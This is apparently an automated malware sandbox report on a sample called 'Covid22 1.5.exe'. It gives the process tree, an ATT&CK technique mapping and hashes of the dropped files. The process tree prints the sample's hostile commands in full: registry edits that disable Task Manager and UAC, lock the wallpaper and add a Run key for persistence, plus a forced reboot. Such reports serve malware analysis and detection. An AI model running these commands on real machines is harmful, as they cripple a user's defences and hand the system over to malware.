"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5528 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:3904

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
PID:4032

C:\Users\Admin\Downloads\Covid22 1.5.exe
"C:\Users\Admin\Downloads\Covid22 1.5.exe"
1⤵
- Executes dropped EXE
PID:5668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C2DE.tmp\Covid22.cmd""
2⤵
PID:5812

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:4192

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
- Modifies registry key
PID:452

C:\Users\Admin\AppData\Local\Temp\C2DE.tmp\CLWCP.exe
clwcp c:\covid.jpg
3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Drops file in Windows directory
PID:5916

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:5956

C:\Windows\SysWOW64\reg.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v CoronaVirus22 /d c:\Covid22Server.exe
3⤵
- Adds Run key to start application
- Modifies registry key
PID:5996

C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 10 /c "Covid-22 Installation Complete! Say bye to your system!"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5984

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38cb855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5552

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
280B

MD5
6477b70c0ed2de4a8b8a66708bff3e7f

SHA1
1c897c680a7215b0a7ed30d94d5e7313bfce2ff4

SHA256
eebb779fbbb56628d08dffb6f46f80dfb897f7f9b44a4ecf2e193729a52f9bc7

SHA512
6f72ebeb6325651d22b1647e60b40ee9e813ce857b659179d8b749b6f89dcb494331618442dd2b80a4395e8bccd0618dece71f7a202bb1c559efd2a63369ce53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
280B

MD5
19208b184743422d573233f5cfd49500

SHA1
3a5715ab4f0d44bb9248267f5a64b229ca3e5104

SHA256
3fd03a5ff06a30b6443547e8a851d1cfc82d82dcc863f8792f232a23f5475902

SHA512
6ec133be7e13fb3fa1ef09ffafd6033a42de63c221a1894e92a62a9370721959b95bd01f737eda8d83d2fbb4dc6e465bcd238ac2cd179916a8f8ed253f178a25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
2KB

MD5
6ca48ae7bad7550bd05d2f7f8e479bec

SHA1
0b640ff3bec071f777ab54716759c74bf91414be

SHA256
8aedbbfc3f92674625ad433cdcef468382d81333cfff5bb30c96adb44439e054

SHA512
1c475fe0a732cd657d594875cadb9955ac7beb50b6dca1cafb4ebe9bdc2d6596e4a18e8efdc6f7bf1372d9599c45a9558efdfb183e7e91c2e11800ed9e0344ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
906629c396059d0049f920977a28320f

SHA1
8fc317d22921658b9ae3a08cc2a7ed759372b63d

SHA256
9af4d2a6244383f7b448ed545cbe1b08a9619c1a18b6fdce058d0450d477d7ba

SHA512
96f2312830f23ec2de4c25c54c9661aaa3abe733048956e58c3772e970f46e0dd3294270f6dd5e16e41d6f22311ef5ba17d9871b797caa00ebe17a571b28eed9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
c2385f0996a8fb15cbd719ce11efa736

SHA1
8459ebb10855f95f13941ab44903c238f20cff2d

SHA256
64cbe7381b58435374f1ec6660d9ed6d425d5b02d09e2ffdf698d94b9412c213

SHA512
157b890aaa9b01be817d90ad1f4b52916e8ee6b0c3da64075a644c4f6bf9a2bca051527af687c4a951e23a9d01922ee50347349d0d8cd6505163ef98f69252f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
b1a0bc866e8c12b97d91a5bad9535eb3

SHA1
7f2e0e231daeb4ec6e9ed4fcc2dd98a8f746e95a

SHA256
ae0a03548dc912465b91943bc7d26ed1b43bcc978de2d6112eae85c889a2656b

SHA512
5a7f004cf839123ccd43ac801ed461b586b487149675e6e883e310bd195d5b6fda866ab7550b3e5198b688d2b6c6597c5009c0a14c11e90f757886291d2caad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
6771cd19bce01c98c320bbdb2e2fbcb9

SHA1
fdd59aef5b5679e343758e6baa76eb43addcce58

SHA256
ddecf01d658ca367c844f92aa2530d19b7c8f71e1b7b988e6996a05861c755e2

SHA512
013e40676b2e2fb77e53135927bcca0b5f352046ea109a81b2a3e6a1c7b2beef4c3927ee98f7be7b62f83b20bfe0091cf1a604f28b381d6830ce82776e72e140

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
11KB

MD5
408f3780e6957158cffb3303937611ce

SHA1
30280a7e55fa97eb2b702b890669145d6c8d259a

SHA256
4ca78f609c9de0a84854bd2a30679d86045e0aabfa28d8088ae827c2e9a2a63c

SHA512
bd5cff8c1c635813423126f8849f667c69b2a4f991c2ec26c50ac448b207a168d481c32849b7ab78e91a64a37bf5edc3e71bcd3d08d1b1679402e73568dbc853

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
11KB

MD5
58a620ae1480ff2b80b0bd75ef08014e

SHA1
af1f3dd0a60a450358e7e59229f2d190a52bce90

SHA256
65b63ae2462e1f08ae97ebcd3ccbe15821f18fecc605caed7d53522761a8ce28

SHA512
f9a008723c61be577f77d07f7550268f91b9b5dd580310471c9f4af3c48ce10eac9b5b23cfb75f8c015d5cb999e922014501e6e61c5386db8ebd6360ff171c82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
11KB

MD5
71a1abbc757c00e0c513961dffa6c545

SHA1
63e19a27d70b12138c695d12b6947e25689877cf

SHA256
94e0dcf29ee2f5df540c312723f17cc9587896d2f6fc47de6b320e797e43834e

SHA512
60aaecaa6f9fca612d4b1f364ef7aec271a19762697d3c58bdd00041d5a81ebeb5fc79afa60269170e2bec607ea6dbf3f2707aebc87ad36c910f7ec4272b4301

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
11KB

MD5
03ae29a455f5c76e931461f5dcaffe99

SHA1
96207d5df4c3223c545159f5d7d4f9ae6a191b80

SHA256
61060530b6f053ce7be2dc9ef0c59542c0873d8c8f369ac172d55c6fef66e988

SHA512
d63c15f8f7efab0ef4bb57d01a12365eab0fdccdb85fe8a59fc01811112053780087cb2fc5c78fc90470dad2a0767bc9c74825b43538cdb4342ccdff963c617e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
11KB

MD5
df137f8ae77755e42dd0db2c85278e0a

SHA1
1daaac3f39a991390dffe9db7546ba150333a296

SHA256
1b31b9117e58ecd48af233878b5c87025f17c78c50caf51eaa688ff34c2ba460

SHA512
19a74d22398348bf4dd731aa5716ac846456201bfaa53e4b62712acbd10d76c2a7c968826324b6d84ead848c6427f1cb4edbac8a992f17a9efd6179f72e43349

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
74KB

MD5
3998c73c7f8cf2e956b194671302555a

SHA1
8ab8296a060a3a5c21ee2787721ba8ae39f8426f

SHA256
cda4c99a8635fafb9ddaac3893d4bbc8d20bd24a66614cdc75a04d9e59c4ef2a

SHA512
f06146a33f3afea8ab5be538846be49bdb9a514273c6df05eca6e76768215774e620dbfeaf58f1810b2c2d52f29ff9e407fcb62ff18fa9be03a0a5c06a6ac4cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
74KB

MD5
fa7746fa3427435a78530ffe8f99211a

SHA1
f1d752bf9f76894e4bdaee816639bc652058ad7b

SHA256
894649bb581751d5d805227dcee05e829b034936cd1720d92132b7fa7bbc78df

SHA512
f298be13992b559a5f547a44f49af2abc491d1c33ebef104917f0a10371b1420bba790a597c2e992096d34429655b243002eefc935a7452c784b81ac3b5b2701

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
74KB

MD5
3b9b1cee1c43e01a4a22d407b52c3343

SHA1
ee7bf0b790383a66fde9709dd571aafcb7dd33ff

SHA256
b78d9a649e3eeef272d195ced5575a7916fd753de7df05633feb786b3d760fe4

SHA512
ae2b82356e401f298fe2f8f6b0b1028d8a8703eb469fb148d6fabcb3c654a97f850cf6721be84cd496be634da72430eeee237258ac2b0f288d9bd321576b407d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
64KB

MD5
bd39b3504d82db4a86a462936fa3a390

SHA1
a0a3c8c1f0971824c775dc47dc3aa275915cee52

SHA256
655e9d14b5f2d0c946e8a4b6f9f5d47bd7093523d3e0c6624bb20163e8b54e49

SHA512
a21581960bc5d4647524242933e37f98ebf703e170a95b2d0b1e2b020435d794f4d90bdd807285ba06b0a62e5cc072a3476bb82be49763b5ac6a43ff5670294a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
74KB

MD5
f1b7a220427890543fb01d254d4afac0

SHA1
d716dd87cdbea9143a514c7c274ecb0ff019c90b

SHA256
a9453411334a882c401682e0ff07283c50fe8c5c8521c3e3dbe4e9201dcaa697

SHA512
9ea44c77b885d7d404d62ad66b017128cd18833bb66da2925a6e88ae9e8df0eebe968da306a69fbf4e3667de5087f9ea42c23e8c582b68eb4630f21ac14652ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\C2DE.tmp\CLWCP.exe
Filesize
505KB

MD5
e62ee6f1efc85cb36d62ab779db6e4ec

SHA1
da07ec94cf2cb2b430e15bd0c5084996a47ee649

SHA256
13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a

SHA512
8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69

Download Submit
C:\Users\Admin\AppData\Local\Temp\C2DE.tmp\Covid22.cmd
Filesize
780B

MD5
02f5a3a196dc5cc0413113eee9812d66

SHA1
ad045b42aaecc9c8dbe90ab3a921a883f65241f2

SHA256
df05a7e889c648450f3248f6bf4684c1634373bc8b4582b6dcddf4946b72933e

SHA512
4ac011606e495af11ed31097039ac119314c673946283d6d76d8bfa7f33cba20e388bd499c469e0bc6385f274f86e151167b39bdcdca194e5873b48a8c5839b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\C2DE.tmp\Covid22Server.exe
Filesize
133KB

MD5
a0c2908abaaed631f853b746edae440b

SHA1
97ba28dde11fa077de32142ee9224aa15325f303

SHA256
0c6dfaa12a98fb17058b79d283e96a3e34549d0ad2be58f505ac8abde858d8a6

SHA512
786b0724e9d5a1a2a1027c829d6a8a004fe8ec86c98fcfb991069e6fbf56d2a104e499d709388b4738edd3aa2dd2323259b5ebfa4c2c464cfdbc7ea396ceb5b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\C2DE.tmp\covid.jpg
Filesize
39KB

MD5
6698ca85bad6bfbfff718517e5670c1f

SHA1
c7975f87fab1b18931fba501cac15c8c85c3b57f

SHA256
5509eee9f17b3a1ea7bb1ccfb5ff2ab82978b17f59c0194ead5042fb671068dc

SHA512
dd2dcbcfbb9ab33e2e83b2181d83bb7684255cbcc7e6efa31580e772bf141a16673cad6d8c50b9b838f5fb7117c32b5effa286c10660fcbd5d950792f2c31f8e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize
10KB

MD5
dc946f87e26e8f62f73d40bca158f143

SHA1
0e06167a72348e7ce681d088465e702192d2e128

SHA256
1a162e23d1b256b8a66948bbd738ce158f96bdc4416f87f47265368f91db992f

SHA512
c4bd1eb518657b8c4952314b3a1a5e8b5322aa913eb5c4223ea6f2172ad97dce217e64e0424e761b057ffcf4c9825643b795bf821e628b81ee830ff8a0e3fa7b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize
8KB

MD5
32b75e101ea5a24a0b98d72f955dd549

SHA1
7402d5cbbc5f9acd6adb7ed4370977570cb52ab3

SHA256
f7a18b7645a62e12493800c375190c2ffccd39ed303f4f47a797ba702b5a1949

SHA512
9b2eae3869e301858c6dde797839f6252a5a5426a437a19bb7b8dbe15c88dbe731c6cfadd092f0de99432dba7afc39cdd4c51261f93afe653fa6af33a8514d1f

Download Submit
C:\Users\Admin\Downloads\Covid22 1.5.exe
Filesize
641KB

MD5
80bcd053031bee7e33c8306d09c8136a

SHA1
e91403dfb42d9292f64a6b4fb002de43123c52cd

SHA256
79f3b39797f0e85d9e537397a6f8966bc288d1b83ae1c313c825fbd17698879e

SHA512
7620613380e358a3215c47fe0e8413340e704f9d41fddbba9b96ff2a1dd23fbbdfb94af98bde5e208e50852d38114d016b953d0a8b722261ee4a9ef0d364fce2

Download Submit
\??\pipe\crashpad_4392_PMPPPMLOWFRKAKYU
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/5668-297-0x0000000000400000-0x000000000052B000-memory.dmp

Filesize
1.2MB

Download
memory/5668-351-0x0000000000400000-0x000000000052B000-memory.dmp

Filesize
1.2MB

Download
memory/5916-324-0x00000000005C0000-0x00000000005C1000-memory.dmp

Filesize
4KB

Download
memory/5916-347-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads